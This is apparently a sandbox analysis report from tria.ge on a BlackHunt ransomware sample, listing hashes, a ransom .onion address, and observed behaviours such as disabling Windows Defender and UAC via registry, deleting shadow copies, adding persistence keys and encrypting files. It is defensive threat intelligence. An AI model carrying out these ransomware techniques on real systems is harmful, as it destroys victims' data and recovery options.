Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
161s -
max time network
178s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:15
Static task
static1
Behavioral task
behavioral1
Sample
992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe
Resource
win10v2004-20231215-en
General
-
Target
992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe
-
Size
707KB
-
MD5
4b944dd7ecab119947153d89ffa7584c
-
SHA1
a5165354faacc1e56181e9685ebd7642f2c0e2be
-
SHA256
992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1
-
SHA512
4475321800a531d892b497797bf4f15d944c405014724ec4dcddf74d8f8247533447289f20f5829db4fac9c78635d7ea245d45a4feb59ba256f1ada2cb3a3f7b
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1u8Tvnh:6uaTmkZJ+naie5OTamgEoKxLWlTh
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2264 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1376 bcdedit.exe 464 bcdedit.exe -
Renames multiple (373) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5116 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\E: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\T: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\Y: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\I: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\N: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\B: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\J: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\R: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\A: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\Z: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\V: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\G: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\W: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\X: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\M: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\L: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\S: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\H: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\K: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\U: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened (read-only) \??\P: 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\br\#BlackHunt_Private.key 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\7-Zip\7z.sfx 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\Java\jdk-1.8\legal\#BlackHunt_ReadMe.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#BlackHunt_ReadMe.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#BlackHunt_Private.key 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\gstreamer.md 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\#BlackHunt_ReadMe.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\dt.jar 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\#BlackHunt_ReadMe.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\Java\jre-1.8\bin\plugin2\#BlackHunt_ReadMe.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\javafx-mx.jar 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\Java\jre-1.8\lib\amd64\#BlackHunt_Private.key 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\mesa3d.md 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\el\#BlackHunt_ReadMe.hta 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_ReadMe.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#BlackHunt_ReadMe.hta 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\ant-javafx.jar 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\ext\#BlackHunt_ReadMe.hta 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\dom.md 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\libxml2.md 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\de\#BlackHunt_Private.key 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr.jar 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\libxslt.md 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\Java\jre-1.8\lib\fonts\#BlackHunt_Private.key 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr\default.jfc 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\#BlackHunt_ReadMe.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_Private.key 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\cmm\LINEAR_RGB.pf 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\deployment.config 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\#BlackHunt_ReadMe.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\dynalink.md 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\jfr\#BlackHunt_ReadMe.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_CN.properties 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\Java\jre-1.8\legal\#BlackHunt_ReadMe.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\javaws.jar 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\#BlackHunt_Private.key 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_ReadMe.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\co\#BlackHunt_ReadMe.hta 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#BlackHunt_Private.key 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\zipfs.jar 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\#BlackHunt_Private.key 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\COPYRIGHT 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\7-Zip\Lang\ar.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\Java\jre-1.8\lib\images\#BlackHunt_Private.key 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\#BlackHunt_ReadMe.hta 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_ReadMe.hta 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\Java\jre-1.8\#BlackHunt_ReadMe.hta 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\jcup.md 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\7-Zip\Lang\sk.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\management\management.properties 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\VideoLAN\VLC\locale\el\#BlackHunt_ReadMe.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\Java\#BlackHunt_ReadMe.txt 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_Private.key 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\nashorn.jar 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1352 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1400 vssadmin.exe 2384 vssadmin.exe 4016 vssadmin.exe 2244 vssadmin.exe 1124 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe Token: SeRestorePrivilege 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe Token: SeBackupPrivilege 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe Token: SeTakeOwnershipPrivilege 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe Token: SeAuditPrivilege 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe Token: SeSecurityPrivilege 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe Token: SeIncBasePriorityPrivilege 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe Token: SeBackupPrivilege 4212 wbengine.exe Token: SeRestorePrivilege 4212 wbengine.exe Token: SeSecurityPrivilege 4212 wbengine.exe Token: SeBackupPrivilege 4124 vssvc.exe Token: SeRestorePrivilege 4124 vssvc.exe Token: SeAuditPrivilege 4124 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4560 wrote to memory of 3552 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 92 PID 4560 wrote to memory of 3552 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 92 PID 4560 wrote to memory of 2472 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 94 PID 4560 wrote to memory of 2472 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 94 PID 4560 wrote to memory of 468 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 96 PID 4560 wrote to memory of 468 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 96 PID 4560 wrote to memory of 3896 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 98 PID 4560 wrote to memory of 3896 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 98 PID 4560 wrote to memory of 5032 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 100 PID 4560 wrote to memory of 5032 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 100 PID 4560 wrote to memory of 1036 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 193 PID 4560 wrote to memory of 1036 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 193 PID 4560 wrote to memory of 3308 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 104 PID 4560 wrote to memory of 3308 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 104 PID 4560 wrote to memory of 4412 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 109 PID 4560 wrote to memory of 4412 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 109 PID 4560 wrote to memory of 1632 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 108 PID 4560 wrote to memory of 1632 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 108 PID 5032 wrote to memory of 324 5032 cmd.exe 110 PID 5032 wrote to memory of 324 5032 cmd.exe 110 PID 4560 wrote to memory of 2144 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 111 PID 4560 wrote to memory of 2144 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 111 PID 468 wrote to memory of 1912 468 cmd.exe 168 PID 468 wrote to memory of 1912 468 cmd.exe 168 PID 3552 wrote to memory of 1224 3552 cmd.exe 171 PID 3552 wrote to memory of 1224 3552 cmd.exe 171 PID 4560 wrote to memory of 1800 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 136 PID 4560 wrote to memory of 1800 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 136 PID 4560 wrote to memory of 4596 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 118 PID 4560 wrote to memory of 4596 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 118 PID 4560 wrote to memory of 1492 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 115 PID 4560 wrote to memory of 1492 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 115 PID 2472 wrote to memory of 1112 2472 cmd.exe 119 PID 2472 wrote to memory of 1112 2472 cmd.exe 119 PID 4560 wrote to memory of 1624 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 120 PID 4560 wrote to memory of 1624 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 120 PID 4560 wrote to memory of 3116 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 135 PID 4560 wrote to memory of 3116 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 135 PID 4560 wrote to memory of 2088 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 121 PID 4560 wrote to memory of 2088 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 121 PID 4560 wrote to memory of 4872 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 122 PID 4560 wrote to memory of 4872 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 122 PID 4560 wrote to memory of 3044 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 126 PID 4560 wrote to memory of 3044 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 126 PID 4560 wrote to memory of 3336 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 123 PID 4560 wrote to memory of 3336 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 123 PID 4560 wrote to memory of 4224 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 132 PID 4560 wrote to memory of 4224 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 132 PID 4560 wrote to memory of 4540 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 127 PID 4560 wrote to memory of 4540 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 127 PID 4560 wrote to memory of 3724 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 138 PID 4560 wrote to memory of 3724 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 138 PID 4560 wrote to memory of 2864 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 139 PID 4560 wrote to memory of 2864 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 139 PID 4560 wrote to memory of 2264 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 211 PID 4560 wrote to memory of 2264 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 211 PID 4560 wrote to memory of 4324 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 153 PID 4560 wrote to memory of 4324 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 153 PID 4560 wrote to memory of 4008 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 152 PID 4560 wrote to memory of 4008 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 152 PID 4560 wrote to memory of 3432 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 144 PID 4560 wrote to memory of 3432 4560 992d69349ff7bfcce617e3b0467e4de7de1b4e6b60d0acb3e03d281caaf405c1.exe 144 PID 3896 wrote to memory of 220 3896 cmd.exe 190 PID 3896 wrote to memory of 220 3896 cmd.exe 190 -
System policy modification 1 TTPs 3 IoCs
